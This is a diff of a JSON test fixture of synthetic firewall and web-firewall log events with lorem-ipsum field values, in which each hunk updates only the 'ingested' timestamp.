@@ -102,7 +102,7 @@ }, "message": "logver=mcolab date=2016-5-22 time=2:30:33 log_id=neav devid=oquisqu devname=sperna logid=eabilloi type=estia subtype=tper level=very-high vd=volupt srcip=10.188.169.107 srcport=2138 srcintf=eth6448 dstip=10.214.7.83 dstport=1696 dstintf=lo1616 poluuid=tenatu sessionid=uun proto=HOPOPT action=cancel policyid=ectio trandisp=dutper duration=4.781000 sentbyte=3423 rcvdbyte=3252 devtype=radi osname=gel osversion=1.3917 mastersrcmac=iduntu srcmac=01:00:5e:21:f5:0a crscore=57.435000 craction=uamqu crlevel=lor eventtype=oide user=dolore service=amvolu hostname=eturadi6608.mail.host profile=aera reqtype=ate url=https://api.example.com/nimid/itatione.htm?umwr=oluptate#issus direction=inbound msg=uaUteni method=udantium cat=pre catdesc=xeacom device_id=stlabo log_id=dictasu pri=low userfrom=catc adminprof=nsect timezone=GMT-07:00 main_type=asia trigger_policy=econs sub_type=uir severity_level=dol policy=essecil src=10.23.62.94 src_port=4368 dst=10.61.163.4 dst_port=1232 http_method=luptatem http_url=atem http_host=gnido http_agent=ratvolu http_session_id=olup signature_subclass=numqua signature_id=1411 srccountry=inculpa content_switch_name=abo server_pool_name=veniamqu false_positive_mitigation=nse user_name=non monitor_status=paquioff http_refer=https://www5.example.org/maven/hende.jpg?labor=didunt#uptatema http_version=intocc dev_id=liqu threat_weight=eporr history_threat_weight=xeacomm threat_level=mveleu ftp_mode=nofdeFin ftp_cmd=sequam cipher_suite=temvel msg_id=ris", "event": { - "ingested": "2021-06-29T09:33:01.618195Z" + "ingested": "2021-12-09T13:37:31.906833700Z" }, "tags": [ "preserve_original_event" 
@@ -114,7 +114,7 @@ }, "message": "date=2016-6-5 time=9:33:08 logver=nisiuta devid=tvolu devname=ecte logid=tinvolu type=iurer subtype=iciadese level=medium vd=gnaaliq srcip=10.52.135.156 srcport=2660 srcintf=eth4502 dstip=10.133.89.11 dstport=1098 dstintf=lo4901 poluuid=sintoc sessionid=volupt proto=1 action=deny policyid=uiinea trandisp=Utenima duration=111.502000 sentbyte=1871 rcvdbyte=5074 devtype=ptatem osname=Nequepor osversion=1.2580 mastersrcmac=ugiatnu srcmac=01:00:5e:4a:7f:b8 crscore=103.738000 craction=mnisi crlevel=scivelit eventtype=tDuisaut user=oinBC service=quameius hostname=ipsumdol4488.api.localdomain profile=ommodico reqtype=ptas url=https://example.com/tetu/stru.htm?tlabore=Exc#pora direction=unknown msg=uteirure method=nevo cat=ide catdesc=aali device_id=adip log_id=tium pri=very-high userfrom=iusmodi adminprof=uamest timezone=PST main_type=uiac trigger_policy=epte sub_type=idolo severity_level=quinesc policy=madmi src=10.28.76.42 src_port=3427 dst=10.106.31.86 dst_port=4198 http_method=sno http_url=atno http_host=tani http_agent=volu http_session_id=nonn signature_subclass=inventor signature_id=6088 srccountry=autf content_switch_name=quamni server_pool_name=iatisu false_positive_mitigation=sec user_name=cons monitor_status=sBon http_refer=https://www.example.com/tae/ccaec.htm?aperiame=isc#ullamcor http_version=tobea dev_id=tor threat_weight=qui history_threat_weight=ntmollit threat_level=tenatus ftp_mode=cipitlab ftp_cmd=ipsumd cipher_suite=antiu msg_id=uirati", "event": { - "ingested": "2021-06-29T09:33:01.618199Z" + "ingested": "2021-12-09T13:37:31.906837800Z" }, "tags": [ "preserve_original_event" 
@@ -126,7 +126,7 @@ }, "message": "logver=ersp dtime=2016-06-20 04:35:42.332538723 +0000 UTC devid=tquov devname=diconseq vd=inven date=2016-6-20 time=4:35:42 logid=osquira type=tes subtype=mquame level=medium eventtime=tnulapa logtime=orain srcip=10.238.164.74 srcport=2201 srcintf=lo4249 srcintfrole=madmi dstip=10.106.162.153 dstport=341 dstintf=lo7114 dstintfrole=amvo poluuid=qui sessionid=tasn proto=1 action=accept policyid=squirati policytype=Sedutp crscore=92.058000 craction=nbyCic crlevel=utlabor appcat=itessequ service=porro srccountry=ine dstcountry=lup trandisp=tatemUt tranip=10.58.214.16 tranport=508 duration=166.566000 sentbyte=2715 rcvdbyte=7130 sentpkt=pici app=abor", "event": { - "ingested": "2021-06-29T09:33:01.618202700Z" + "ingested": "2021-12-09T13:37:31.906842Z" }, "tags": [ "preserve_original_event" @@ -138,7 +138,7 @@ }, "message": "logver=tquiin dtime=2016-07-04 11:38:16.592538723 +0000 UTC devid=tse devname=tenimad vd=minimav date=2016-7-4 time=11:38:16 logid=udexerci type=naal subtype=lore level=high eventtime=idolore logtime=pid srcip=10.225.141.20 srcport=2282 srcintf=enp0s4046 srcintfrole=natuse dstip=10.217.150.196 dstport=4639 dstintf=lo2438 dstintfrole=archite poluuid=loreme sessionid=untu proto=6 action=cancel policyid=datatno policytype=siutali crscore=49.988000 craction=usmodte crlevel=msequi appcat=tau service=exercita srccountry=ris dstcountry=eumiu trandisp=orumSe tranip=10.110.31.190 tranport=945 duration=12.946000 sentbyte=248 rcvdbyte=5300 sentpkt=eeufugia app=evit", "event": { - "ingested": "2021-06-29T09:33:01.618206700Z" + "ingested": "2021-12-09T13:37:31.906874Z" }, "tags": [ "preserve_original_event" 
@@ -150,7 +150,7 @@ }, "message": "date=2016-7-18 time=6:40:50 devname=molli device_id=velitse log_id=oditem type=generic subtype=gitsedqu pri=very-high devid=oremi devname=mestq logid=temUt type=olor subtype=ineavo level=very-high vd=mquelau srcip=10.168.236.85 srcport=6846 srcintf=eth651 dstip=10.140.113.244 dstport=4374 dstintf=lo4367 poluuid=fugitsed sessionid=quam proto=tcp action=deny policyid=fugiat trandisp=atisun duration=101.653000 sentbyte=3962 rcvdbyte=7741 devtype=dmin osname=fugi osversion=1.3319 mastersrcmac=inci srcmac=01:00:5e:e6:ad:ae crscore=39.291000 craction=avol crlevel=icero eventtype=xer user=emipsumd service=isisten hostname=cusant4946.www.domain profile=itecto reqtype=reetdol url=https://api.example.com/isnostr/umqu.htm?emquia=inesci#isnisi direction=unknown msg=aquioffi method=tamet cat=quatur catdesc=uisa device_id=eFi log_id=mexe pri=high userfrom=rpori adminprof=ice timezone=GMT+02:00 main_type=entorev trigger_policy=commodo sub_type=conseq severity_level=ame policy=tatn src=10.137.56.173 src_port=3932 dst=10.69.103.176 dst_port=1229 http_method=umdolo http_url=uptate http_host=amc http_agent=cusant http_session_id=orumSe signature_subclass=ratv signature_id=5227 srccountry=dutp content_switch_name=psaquaea server_pool_name=taevita false_positive_mitigation=ameiusm user_name=proide monitor_status=ano http_refer=https://www5.example.org/tvol/velitess.htm?edqui=nre#veli http_version=volupta dev_id=rnatu threat_weight=elitse history_threat_weight=ima threat_level=quasia ftp_mode=adi ftp_cmd=umwrit cipher_suite=uptate msg_id=mac", "event": { - "ingested": "2021-06-29T09:33:01.618210100Z" + "ingested": "2021-12-09T13:37:31.906881300Z" }, "tags": [ "preserve_original_event" 
@@ -162,7 +162,7 @@ }, "message": "logver=dolore devname=\"onsecte\" devid=\"nBCSedut\" vd=ugiat date=2016-8-2 time=1:43:25 logid=onulam type=ate subtype=odoconse level=high eventtime=quatu logtime=veli srcip=10.30.47.165 srcport=631 srcintf=eth267 srcintfrole=sectet dstip=10.5.235.217 dstport=3689 dstintf=lo5047 dstintfrole=pitl poluuid=por sessionid=quidexea proto=tcp action=deny policyid=runtmol policytype=texpli crscore=57.772000 craction=ptass crlevel=rita appcat=esseci service=tametcon srccountry=liqua dstcountry=mvele trandisp=isis tranip=10.25.212.118 tranport=1190 duration=179.686000 sentbyte=238 rcvdbyte=7122 sentpkt=dantium app=lor", "event": { - "ingested": "2021-06-29T09:33:01.618213800Z" + "ingested": "2021-12-09T13:37:31.906888500Z" }, "tags": [ "preserve_original_event" 
@@ -174,7 +174,7 @@ }, "message": "date=2016-8-16 time=8:45:59 logver=onemulla devid=dolorem devname=tvolu logid=nreprehe type=tetu subtype=mdol level=high vd=nby srcip=10.20.26.210 srcport=2791 srcintf=eth5968 dstip=10.85.96.153 dstport=5286 dstintf=eth4392 poluuid=nsequat sessionid=doloreme proto=0 action=deny policyid=reprehe trandisp=tincu duration=93.111000 sentbyte=2826 rcvdbyte=6247 devtype=lor osname=oraincid osversion=1.225 mastersrcmac=emeumfug srcmac=01:00:5e:1d:39:39 crscore=114.626000 craction=liqua crlevel=olo eventtype=psumqu user=untincul service=iduntu hostname=ccaeca5504.internal.example profile=reseo reqtype=oreetd url=https://example.org/tiaec/rumwrit.txt?oconsequ=edquiac#urerepr direction=external msg=ercit method=etMal cat=qua catdesc=rsita device_id=ate log_id=ipsamvo pri=low userfrom=adeseru adminprof=tdol timezone=CET main_type=rem trigger_policy=asper sub_type=idunt severity_level=luptat policy=eveli src=10.149.13.76 src_port=7809 dst=10.40.152.253 dst_port=1478 http_method=ritt http_url=iaeco http_host=equaturv http_agent=siu http_session_id=snost signature_subclass=tpersp signature_id=2624 srccountry=quaea content_switch_name=ametcons server_pool_name=utali false_positive_mitigation=porinc user_name=tetur monitor_status=xce http_refer=https://example.com/aincidu/nimadmin.jpg?itinv=eumfugi#etdolor http_version=lupta dev_id=xeaco threat_weight=nvolupt history_threat_weight=oremi threat_level=elites ftp_mode=nbyCi ftp_cmd=tevel cipher_suite=usc msg_id=rem", "event": { - "ingested": "2021-06-29T09:33:01.618218100Z" + "ingested": "2021-12-09T13:37:31.906893800Z" }, "tags": [ "preserve_original_event" 
@@ -186,7 +186,7 @@ }, "message": "logver=cab dtime=2016-08-30 15:48:33.632538723 +0000 UTC devid=atisund devname=xea vd=ites date=2016-8-30 time=3:48:33 logid=isetq type=iutali subtype=velite level=high eventtime=avolupt logtime=ariatur srcip=10.98.194.212 srcport=5469 srcintf=lo1208 srcintfrole=atisetqu dstip=10.51.213.42 dstport=988 dstintf=enp0s3449 dstintfrole=ilmol poluuid=eri sessionid=quunt proto=HOPOPT action=deny policyid=mquae policytype=eriti crscore=96.729000 craction=cidunt crlevel=plica appcat=ore service=quidolor srccountry=inven dstcountry=eufugi trandisp=accusant tranip=10.233.120.207 tranport=136 duration=171.844000 sentbyte=2859 rcvdbyte=4844 sentpkt=eaqu app=nvol", "event": { - "ingested": "2021-06-29T09:33:01.618222900Z" + "ingested": "2021-12-09T13:37:31.906899600Z" }, "tags": [ "preserve_original_event" @@ -198,7 +198,7 @@ }, "message": "logver=leumiu devname=\"tla\" devid=\"item\" vd=nimid date=2016-9-13 time=10:51:07 logid=dat type=periam subtype=dqu level=high eventtime=dminima logtime=dutpers srcip=10.245.187.229 srcport=4953 srcintf=lo3642 srcintfrole=prehen dstip=10.67.132.242 dstport=2340 dstintf=enp0s2700 dstintfrole=sequa poluuid=iosamnis sessionid=volupt proto=6 action=allow policyid=idid policytype=tesse crscore=64.509000 craction=boru crlevel=ptateve appcat=enderi service=ptatem srccountry=ptatevel dstcountry=tenatuse trandisp=psaqua tranip=10.241.132.176 tranport=7224 duration=167.705000 sentbyte=6595 rcvdbyte=7301 sentpkt=tame app=atione", "event": { - "ingested": "2021-06-29T09:33:01.618226600Z" + "ingested": "2021-12-09T13:37:31.906905600Z" }, "tags": [ "preserve_original_event" 
@@ -210,7 +210,7 @@ }, "message": "date=2016-9-28 time=5:53:42 logver=vitaedic devid=orin devname=uii logid=estl type=sitam subtype=orem level=very-high vd=uuntur srcip=10.210.28.247 srcport=3449 srcintf=eth4185 dstip=10.237.180.17 dstport=3023 dstintf=lo7672 poluuid=tate sessionid=onevo proto=6 action=allow policyid=aeconseq trandisp=lor duration=96.560000 sentbyte=2760 rcvdbyte=1775 devtype=emqu osname=riss osversion=1.1847 mastersrcmac=sitvol srcmac=01:00:5e:a5:5a:54 crscore=129.120000 craction=olorsi crlevel=aliq eventtype=mes user=mven service=olorsit hostname=tore7088.www.invalid profile=ruredo reqtype=mac url=https://mail.example.org/ptassita/its.gif?risnis=uov#itlab direction=outbound msg=sBono method=loremqu cat=tetur catdesc=amvo device_id=siuta log_id=urmagn pri=low userfrom=uptat adminprof=idex timezone=GMT+02:00 main_type=tatione trigger_policy=nimveni sub_type=idi severity_level=ore policy=quid src=10.212.214.4 src_port=6040 dst=10.199.47.220 dst_port=4084 http_method=oin http_url=hil http_host=cingel http_agent=modocon http_session_id=ipsu signature_subclass=ntNeq signature_id=1081 srccountry=aUt content_switch_name=boNem server_pool_name=nturm false_positive_mitigation=emips user_name=atv monitor_status=onu http_refer=https://www5.example.net/alorum/obeataev.gif?atDu=nsec#quidolor http_version=oqu dev_id=naaliq threat_weight=remeu history_threat_weight=osquir threat_level=mod ftp_mode=col ftp_cmd=mve cipher_suite=liquide msg_id=odt", "event": { - "ingested": "2021-06-29T09:33:01.618230400Z" + "ingested": "2021-12-09T13:37:31.906911400Z" }, "tags": [ "preserve_original_event" 
@@ -222,7 +222,7 @@ }, "message": "date=2016-10-12 time=12:56:16 logver=inv devid=rroq devname=rcit logid=aecatcup type=olabor subtype=estl level=very-high vd=citatio srcip=10.168.40.197 srcport=7699 srcintf=enp0s3071 dstip=10.206.69.135 dstport=6396 dstintf=eth3862 poluuid=utfug sessionid=aturQu proto=udp action=deny policyid=mipsamvo trandisp=eiusmod duration=91.147000 sentbyte=6153 rcvdbyte=4059 devtype=oreveri osname=ehende osversion=1.760 mastersrcmac=Except srcmac=01:00:5e:bf:07:ee crscore=45.760000 craction=dol crlevel=sciun eventtype=metcons user=itasper service=uae hostname=mve1890.internal.home profile=tatemU reqtype=mad url=https://www.example.org/redol/gnaa.htm?aliquamq=dtempori#toditaut direction=unknown msg=dexerc method=strumex cat=eprehend catdesc=asnu device_id=hitec log_id=henderit pri=medium userfrom=perspici adminprof=ationul timezone=PST main_type=itsedq trigger_policy=uto sub_type=emUte severity_level=molestia policy=quir src=10.46.56.204 src_port=2463 dst=10.234.165.130 dst_port=7079 http_method=umf http_url=quames http_host=dolorsit http_agent=archite http_session_id=remq signature_subclass=veniamq signature_id=1236 srccountry=uta content_switch_name=emo server_pool_name=itq false_positive_mitigation=derit user_name=orese monitor_status=dolor http_refer=https://mail.example.com/ntexpl/dunt.jpg?yCic=nder#mdolore http_version=Cic dev_id=olorema threat_weight=mollita history_threat_weight=tatem threat_level=iae ftp_mode=quido ftp_cmd=emip cipher_suite=inBC msg_id=mol", "event": { - "ingested": "2021-06-29T09:33:01.618235700Z" + "ingested": "2021-12-09T13:37:31.906917200Z" }, "tags": [ "preserve_original_event" 
@@ -234,7 +234,7 @@ }, "message": "logver=turadipi date=2016-10-26 time=7:58:50 log_id=usmodi devid=ree devname=saquaea logid=ation type=luptas subtype=minim level=very-high vd=lorsi srcip=10.61.123.159 srcport=754 srcintf=eth7713 dstip=10.141.158.225 dstport=4690 dstintf=lo1586 poluuid=ate sessionid=idolor proto=1 action=block policyid=nreprehe trandisp=onse duration=71.505000 sentbyte=4010 rcvdbyte=4527 devtype=duntutla osname=ntium osversion=1.4450 mastersrcmac=asuntexp srcmac=01:00:5e:26:56:73 crscore=5.843000 craction=nse crlevel=modoc eventtype=boNem user=iumt service=tsed hostname=eturad6143.www.home profile=uamnihil reqtype=llam url=https://example.net/aparia/tatnon.jpg?rever=ore#offici direction=outbound msg=metco method=acom cat=ceroinB catdesc=nim device_id=utaliqu log_id=rsi pri=high userfrom=imadmi adminprof=isnis timezone=CEST main_type=olupta trigger_policy=tsuntinc sub_type=inrepreh severity_level=quovo policy=urExcep src=10.128.46.70 src_port=5269 dst=10.95.117.134 dst_port=1723 http_method=acommodi http_url=essecill http_host=billoi http_agent=moles http_session_id=dipiscin signature_subclass=olup signature_id=5976 srccountry=undeomni content_switch_name=accusa server_pool_name=natu false_positive_mitigation=liquid user_name=enim monitor_status=Finibus http_refer=https://www.example.org/xeacom/des.gif?umdolo=ntiu#radipisc http_version=Cice dev_id=taedi threat_weight=tquido history_threat_weight=ptasnula threat_level=oru ftp_mode=ill ftp_cmd=mporinc cipher_suite=onsectet msg_id=idolo", "event": { - "ingested": "2021-06-29T09:33:01.618240Z" + "ingested": "2021-12-09T13:37:31.906923Z" }, "tags": [ "preserve_original_event" 
@@ -246,7 +246,7 @@ }, "message": "date=2016-11-10 time=3:01:24 logver=edolo devid=ugiatquo devname=ntium logid=uptate type=lloinven subtype=econs level=medium vd=tetura srcip=10.135.106.42 srcport=6602 srcintf=lo154 dstip=10.224.30.160 dstport=5302 dstintf=eth1247 poluuid=etconsec sessionid=caboNem proto=21 action=cancel policyid=rumetMal trandisp=oconse duration=2.970000 sentbyte=7685 rcvdbyte=1506 devtype=sequam osname=oditempo osversion=1.7544 mastersrcmac=taliqui srcmac=01:00:5e:98:79:a3 crscore=78.248000 craction=rcitat crlevel=dolorema eventtype=emagn user=radipis service=ctetu hostname=orinrep5386.www.corp profile=stenatus reqtype=equep url=https://www.example.com/tali/BCS.txt?iqu=niamqu#equamnih direction=inbound msg=autemv method=emq cat=plicaboN catdesc=amc device_id=vol log_id=admi pri=medium userfrom=culpaq adminprof=saute timezone=GMT+02:00 main_type=ende trigger_policy=abor sub_type=magnid severity_level=adol policy=iutal src=10.208.21.135 src_port=2721 dst=10.253.228.140 dst_port=6748 http_method=ugitse http_url=quiineav http_host=billoinv http_agent=sci http_session_id=col signature_subclass=obea signature_id=5700 srccountry=tatev content_switch_name=luptas server_pool_name=uptatem false_positive_mitigation=oinv user_name=inculp monitor_status=onofd http_refer=https://internal.example.org/nisiu/imad.html?ptatem=itasp#dexe http_version=tat dev_id=onproide threat_weight=ntmo history_threat_weight=loreeu threat_level=temse ftp_mode=aspernat ftp_cmd=ume cipher_suite=caecat msg_id=rautod", "event": { - "ingested": "2021-06-29T09:33:01.618245400Z" + "ingested": "2021-12-09T13:37:31.906928700Z" }, "tags": [ "preserve_original_event" 
@@ -258,7 +258,7 @@ }, "message": "logver=ercitat date=2016-11-24 time=10:03:59 log_id=lapar devid=ritati devname=edquia logid=itesse type=mullam subtype=mexerc level=medium vd=amvolu srcip=10.120.231.161 srcport=1129 srcintf=lo653 dstip=10.210.62.203 dstport=4381 dstintf=lo3057 poluuid=ataevita sessionid=oremqu proto=6 action=cancel policyid=velitsed trandisp=magnaali duration=92.900000 sentbyte=3984 rcvdbyte=4009 devtype=ulla osname=equatDu osversion=1.1710 mastersrcmac=aconse srcmac=01:00:5e:92:c2:23 crscore=20.350000 craction=squira crlevel=aliqui eventtype=ess user=uide service=scivel hostname=henderi724.www5.home profile=tquas reqtype=aquio url=https://www.example.com/iame/orroquis.htm?tiumd=ntmoll#mexer direction=internal msg=isnostru method=nofdeFi cat=aquioff catdesc=saqu device_id=remips log_id=illoi pri=medium userfrom=abori adminprof=uisnostr timezone=GMT+02:00 main_type=ilmole trigger_policy=ugi sub_type=niamquis severity_level=nisi policy=emveleum src=10.243.226.122 src_port=3512 dst=10.3.23.172 dst_port=7332 http_method=emullamc http_url=tec http_host=Nemo http_agent=tutlabo http_session_id=mveleum signature_subclass=liq signature_id=7229 srccountry=sBonorum content_switch_name=atems server_pool_name=quira false_positive_mitigation=tassita user_name=olorem monitor_status=sedquiac http_refer=https://www.example.com/atDuis/asnulapa.html?rumwri=velill#ore http_version=tation dev_id=loinve threat_weight=tatevel history_threat_weight=iumdolo threat_level=untu ftp_mode=ict ftp_cmd=squirati cipher_suite=tem msg_id=mestq", "event": { - "ingested": "2021-06-29T09:33:01.618249700Z" + "ingested": "2021-12-09T13:37:31.906934400Z" }, "tags": [ "preserve_original_event" 
@@ -270,7 +270,7 @@ }, "message": "logver=luptate date=2016-12-8 time=5:06:33 log_id=llamc devid=eleumiu devname=uei logid=Nequepo type=radipis subtype=cive level=low vd=orumSec srcip=10.56.74.7 srcport=6149 srcintf=eth2940 dstip=10.73.10.215 dstport=2079 dstintf=lo3472 poluuid=oeni sessionid=untutlab proto=0 action=cancel policyid=consecte trandisp=pteurs duration=26.872000 sentbyte=617 rcvdbyte=1651 devtype=ons osname=tiaecon osversion=1.5380 mastersrcmac=unt srcmac=01:00:5e:99:7b:4a crscore=124.392000 craction=queporro crlevel=uid eventtype=snostrum user=psa service=nculpaq hostname=reseosqu1629.mail.lan profile=utemvel reqtype=epteur url=https://www.example.net/iame/laudanti.htm?stquido=rsitvolu#mnisi direction=external msg=uameiusm method=adm cat=gelitsed catdesc=tiumto device_id=cor log_id=odoco pri=high userfrom=labore adminprof=ianonnu timezone=PST main_type=rum trigger_policy=erc sub_type=ehende severity_level=tutla policy=licaboNe src=10.94.242.80 src_port=2724 dst=10.106.85.174 dst_port=307 http_method=atiset http_url=serror http_host=onse http_agent=umquam http_session_id=emagn signature_subclass=emulla signature_id=1963 srccountry=iquaUt content_switch_name=mnihilm server_pool_name=redo false_positive_mitigation=etMaloru user_name=lmo monitor_status=iquidex http_refer=https://www.example.org/remipsu/tan.html?mcorpor=doconse#etdol http_version=dolorsi dev_id=nturmag threat_weight=tura history_threat_weight=osquirat threat_level=equat ftp_mode=aliquid ftp_cmd=usantiu cipher_suite=idunt msg_id=atqu", "event": { - "ingested": "2021-06-29T09:33:01.618253300Z" + "ingested": "2021-12-09T13:37:31.906940200Z" }, "tags": [ "preserve_original_event" 
@@ -282,7 +282,7 @@ }, "message": "logver=liquam dtime=2016-12-23 00:09:07.712538723 +0000 UTC devid=min devname=oluptat vd=odt date=2016-12-23 time=12:09:07 logid=rspici type=snisi subtype=magnaal level=low eventtime=etquasia logtime=nula srcip=10.117.63.181 srcport=5299 srcintf=lo7416 srcintfrole=Cicero dstip=10.247.53.179 dstport=6493 dstintf=lo3706 dstintfrole=atemaccu poluuid=veritat sessionid=aliquipe proto=3 action=block policyid=aer policytype=osquira crscore=171.144000 craction=minim crlevel=scipi appcat=tur service=acon srccountry=Nemoenim dstcountry=usm trandisp=labori tranip=10.168.20.20 tranport=68 duration=167.038000 sentbyte=7188 rcvdbyte=5749 sentpkt=xeac app=umdolors", "event": { - "ingested": "2021-06-29T09:33:01.618258700Z" + "ingested": "2021-12-09T13:37:31.906944300Z" }, "tags": [ "preserve_original_event" 
@@ -294,7 +294,7 @@ }, "message": "logver=uiadolo date=2017-1-6 time=7:11:41 log_id=empor devid=umexerci devname=duntut logid=uovol type=prehend subtype=eufug level=low vd=eufug srcip=10.100.53.8 srcport=4318 srcintf=eth5767 dstip=10.163.17.172 dstport=854 dstintf=enp0s3903 poluuid=upta sessionid=atc proto=3 action=block policyid=upta trandisp=itessequ duration=165.935000 sentbyte=4211 rcvdbyte=405 devtype=exerci osname=idata osversion=1.2208 mastersrcmac=usmod srcmac=01:00:5e:c0:47:f3 crscore=135.374000 craction=isiutali crlevel=iquidexe eventtype=illumq user=luptatem service=ite hostname=tasnul4179.internal.host profile=amvo reqtype=tnul url=https://www.example.org/ess/quiad.jpg?ten=litanim#rQuisaut direction=inbound msg=modico method=metco cat=cillu catdesc=iuntNeq device_id=eddoei log_id=rsin pri=very-high userfrom=eriam adminprof=pernat timezone=CEST main_type=imve trigger_policy=essequam sub_type=ueporro severity_level=aliqu policy=upt src=10.141.156.217 src_port=2700 dst=10.53.168.187 dst_port=73 http_method=emacc http_url=emp http_host=lamcola http_agent=veli http_session_id=venia signature_subclass=risni signature_id=1535 srccountry=uat content_switch_name=onemulla server_pool_name=riaturEx false_positive_mitigation=deri user_name=amqu monitor_status=lorsitam http_refer=https://api.example.org/onpr/litseddo.gif?oremqu=idex#radip http_version=upta dev_id=tetura threat_weight=rumet history_threat_weight=uptasnul threat_level=antiumdo ftp_mode=ecill ftp_cmd=iduntu cipher_suite=pisci msg_id=sunt", "event": { - "ingested": "2021-06-29T09:33:01.618266300Z" + "ingested": "2021-12-09T13:37:31.906948900Z" }, "tags": [ "preserve_original_event" 
@@ -306,7 +306,7 @@ }, "message": "date=2017-1-20 time=2:14:16 devname=oco device_id=aboree log_id=ainci type=generic subtype=osqu pri=very-high devid=sus devname=imavenia logid=expli type=ugiat subtype=rnat level=low vd=orem srcip=10.37.174.58 srcport=3193 srcintf=lo2990 dstip=10.249.60.66 dstport=4859 dstintf=enp0s1732 poluuid=eve sessionid=tco proto=3 action=accept policyid=oluptate trandisp=lit duration=70.988000 sentbyte=6327 rcvdbyte=837 devtype=oquisqu osname=turadip osversion=1.3402 mastersrcmac=amc srcmac=01:00:5e:dd:dc:44 crscore=160.379000 craction=apar crlevel=runtm eventtype=eturadip user=olorsi service=itseddo hostname=bore5546.www.local profile=labo reqtype=lpaquiof url=https://example.com/xeac/llitanim.txt?oreverit=scip#Finibus direction=inbound msg=eufugia method=ncididun cat=hen catdesc=periamea device_id=itametco log_id=vel pri=high userfrom=rere adminprof=pta timezone=CEST main_type=equeporr trigger_policy=met sub_type=volup severity_level=ptate policy=entsu src=10.44.198.184 src_port=5695 dst=10.189.82.19 dst_port=4267 http_method=odoc http_url=atura http_host=tur http_agent=tur http_session_id=atnonpr signature_subclass=ita signature_id=7570 srccountry=colabori content_switch_name=imidestl server_pool_name=piscing false_positive_mitigation=ceroi user_name=iconsequ monitor_status=iat http_refer=https://www.example.net/siuta/atev.htm?CSe=exerci#inesciu http_version=quid dev_id=atcupid threat_weight=onse history_threat_weight=psa threat_level=ate ftp_mode=con ftp_cmd=tqu cipher_suite=eirur msg_id=dese", "event": { - "ingested": "2021-06-29T09:33:01.618270900Z" + "ingested": "2021-12-09T13:37:31.906954200Z" }, "tags": [ "preserve_original_event" 
@@ -318,7 +318,7 @@ }, "message": "logver=mquisnos date=2017-2-3 time=9:16:50 log_id=lore devid=isci devname=Dui logid=reetdo type=ever subtype=civelits level=high vd=quiav srcip=10.154.34.15 srcport=5986 srcintf=enp0s4064 dstip=10.153.172.249 dstport=7030 dstintf=enp0s3067 poluuid=henderit sessionid=remq proto=21 action=cancel policyid=tla trandisp=arch duration=52.795000 sentbyte=5453 rcvdbyte=3097 devtype=ror osname=onsecte osversion=1.91 mastersrcmac=aecatcup srcmac=01:00:5e:58:7e:f5 crscore=133.560000 craction=quas crlevel=occaeca eventtype=eturadip user=ent service=rumSecti hostname=Utenima260.mail.invalid profile=cept reqtype=aedictas url=https://api.example.org/orio/gna.gif?aaliquaU=olu#iameaque direction=external msg=essequa method=aquio cat=rspicia catdesc=deom device_id=oluptat log_id=roinBCSe pri=medium userfrom=onproide adminprof=uamnih timezone=GMT+02:00 main_type=tatisetq trigger_policy=uidolo sub_type=umdolore severity_level=dmi policy=tam src=10.151.170.207 src_port=1400 dst=10.181.183.104 dst_port=5554 http_method=amni http_url=tatio http_host=amquisno http_agent=modoc http_session_id=magnam signature_subclass=uinesc signature_id=4248 srccountry=idatat content_switch_name=onev server_pool_name=orsi false_positive_mitigation=ntsunt user_name=iosamni monitor_status=idu http_refer=https://example.net/idolo/reet.txt?its=umdolor#isiu http_version=assi dev_id=eserun threat_weight=rvelill history_threat_weight=lupta threat_level=byC ftp_mode=imadm ftp_cmd=uta cipher_suite=tisu msg_id=remagnam", "event": { - "ingested": "2021-06-29T09:33:01.618276300Z" + "ingested": "2021-12-09T13:37:31.906958900Z" }, "tags": [ "preserve_original_event" 
@@ -330,7 +330,7 @@ }, "message": "logver=iumdo date=2017-2-18 time=4:19:24 log_id=iusmodit devid=aturv devname=ectetura logid=obeataev type=umf subtype=olesti level=low vd=quaeabil srcip=10.19.99.129 srcport=956 srcintf=eth62 dstip=10.205.132.218 dstport=1643 dstintf=enp0s5908 poluuid=inim sessionid=etdol proto=17 action=deny policyid=oremeumf trandisp=lesti duration=49.961000 sentbyte=3376 rcvdbyte=6209 devtype=enima osname=tnulapar osversion=1.7278 mastersrcmac=sequ srcmac=01:00:5e:4a:1d:f8 crscore=84.522000 craction=tionula crlevel=accus eventtype=uatu user=mquis service=lab hostname=uido2046.mail.lan profile=tena reqtype=aal url=https://mail.example.org/nimadmin/lumqui.txt?iquip=tinculpa#umtota direction=external msg=rumSecti method=riamea cat=eca catdesc=oluptate device_id=Duisa log_id=consequa pri=low userfrom=iaecon adminprof=aevitaed timezone=PT main_type=rep trigger_policy=remap sub_type=deri severity_level=quaeratv policy=involu src=10.70.7.23 src_port=2758 dst=10.130.240.11 dst_port=6515 http_method=odic http_url=iuta http_host=liquaUte http_agent=scivelit http_session_id=Nequ signature_subclass=quid signature_id=1044 srccountry=lloinve content_switch_name=borisnis server_pool_name=onorumet false_positive_mitigation=ptatema user_name=eavolup monitor_status=ipsumq http_refer=https://www.example.org/tno/iss.gif?ptatev=atu#teturad http_version=eturad dev_id=tDuis threat_weight=mwritten history_threat_weight=tat threat_level=equ ftp_mode=sumdolo ftp_cmd=idolorem cipher_suite=temvele msg_id=oremque", "event": { - "ingested": "2021-06-29T09:33:01.618283800Z" + "ingested": "2021-12-09T13:37:31.906963800Z" }, "tags": [ "preserve_original_event" 
@@ -342,7 +342,7 @@ }, "message": "logver=inimve devname=\"uio\" devid=\"mexercit\" vd=byC date=2017-3-4 time=11:21:59 logid=uae type=oremip subtype=its level=very-high eventtime=iavol logtime=natuserr srcip=10.37.161.101 srcport=1552 srcintf=enp0s6659 srcintfrole=evit dstip=10.111.182.212 dstport=4493 dstintf=lo6533 dstintfrole=lamco poluuid=tion sessionid=hender proto=icmp action=deny policyid=seq policytype=rumSe crscore=88.660000 craction=madmi crlevel=tlabore appcat=idunt service=expl srccountry=olore dstcountry=uian trandisp=atuserro tranip=10.17.209.252 tranport=2119 duration=135.770000 sentbyte=313 rcvdbyte=6509 sentpkt=oinBCS app=itsedd", "event": { - "ingested": "2021-06-29T09:33:01.618288900Z" + "ingested": "2021-12-09T13:37:31.906967700Z" }, "tags": [ "preserve_original_event" @@ -354,7 +354,7 @@ }, "message": "logver=ipis devname=\"itautfu\" devid=\"nesci\" vd=tam date=2017-3-18 time=6:24:33 logid=sin type=idexeac subtype=nimadmin level=medium eventtime=edutper logtime=tevelite srcip=10.158.175.98 srcport=1491 srcintf=enp0s7649 srcintfrole=oinBCSed dstip=10.170.196.181 dstport=6994 dstintf=enp0s5873 dstintfrole=obeatae poluuid=iquid sessionid=evo proto=udp action=allow 